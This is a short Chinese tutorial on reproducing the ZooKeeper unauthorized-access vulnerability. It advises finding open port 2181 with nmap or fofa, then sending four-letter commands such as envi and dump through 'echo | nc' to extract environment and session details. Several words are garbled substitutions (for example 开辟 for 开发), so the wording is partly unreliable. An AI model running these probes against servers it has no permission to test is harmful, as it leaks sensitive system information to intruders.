1. ZooKeeper未授权漏洞复现
1.1 ZooKeeper简介
ZooKeeper 是一个分布式的、开源的和谐服务,最初由雅虎开辟,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的紧张组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用步伐的开辟和维护,它通过提供一组简单易用的原语和数据模子,为分布式系统中的进程提供协作服务。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令得到系统大量的敏感信息,包罗系统名称、Java情况。
1.2 ZooKeeper漏洞复现
1.利用nmap或者fofa扫描发现端口2181或者服务
2.利用根本命令格式:echo 命令|nc 目标ip 目标端口
- stat:列出关于性能和连接的客户端的统计信息。
- echo stat | nc 127.0.0.1 2181
- ruok:测试服务器是否运行在非错误状态。
- echo ruok | nc 127.0.0.1 2181
- reqs:列出未完成的请求。
- echo reqs | nc 127.0.0.1 2181
- envi:打印有关服务环境的详细信息。
- echo envi | nc 127.0.0.1 2181
- dump:列出未完成的会话和临时节点。
- echo dump | nc 127.0.0.1 2181
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
